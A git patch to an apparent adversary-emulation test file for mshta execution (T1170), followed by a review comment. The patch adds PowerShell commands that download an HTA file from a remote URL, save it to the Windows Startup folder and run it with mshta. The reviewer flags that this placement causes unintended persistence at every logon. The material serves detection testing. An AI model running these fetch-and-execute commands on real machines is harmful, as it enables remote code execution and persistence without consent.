From 65ecf19fdba3ce40c789e85cd497be545dc3882b Mon Sep 17 00:00:00 2001
From: rsjohnson07 <53159380+rsjohnson07@users.noreply.github.com>
Date: Wed, 22 Jan 2020 09:15:30 -0600
Subject: [PATCH] Update T1170.yaml (#789)

Change test # 4 Mshta Executes Remote HTML Application (HTA) Updated executor Updated commands syntax Added Clean up command
---
 atomics/T1170/T1170.yaml | 13 +++++++++++--
 1 file changed, 11 insertions(+), 2 deletions(-)

diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml
index 964679e8..72b74fc7 100644
--- a/atomics/T1170/T1170.yaml
+++ b/atomics/T1170/T1170.yaml
@@ -59,7 +59,16 @@ atomic_tests:
       description: URL to HTA file for execution
       type: string
       default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1170/src/T1170.hta
+    temp_file:
+      description: temp_file location for hta
+      type: string
+      default: $env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1170.hta
   executor:
-    name: command_prompt
+    name: powershell
     command: |
-      mshta #{hta_url}
+      $var =Invoke-WebRequest "#{hta_url}"
+      $var.content|out-file "#{temp_file}"
+      mshta "#{temp_file}"
+    cleanup_command: |
+      remove-item "#{temp_file}"
+
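Review bot: The new `temp_file` default writes the downloaded HTA into the user's Startup folder (`$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1170.hta`), so if `cleanup_command` is skipped or fails, the remotely fetched file runs again at every logon — a persistence side effect that neither this T1170 execution test's `description` nor the commit message mentions. Unless the Startup location is deliberate, a neutral default such as `$env:TEMP\T1170.hta` keeps the test scoped to mshta execution; if it is deliberate, the argument's `description` should state that the file is placed in the Startup folder and that cleanup must run. The cleanup line will also error when the download never produced the file, so `remove-item "#{temp_file}" -ErrorAction Ignore` is the safer form. Finally, `Invoke-WebRequest` without `-UseBasicParsing` can stall on hosts where Internet Explorer's first-run configuration has not completed, which would leave the test hanging before mshta is reached.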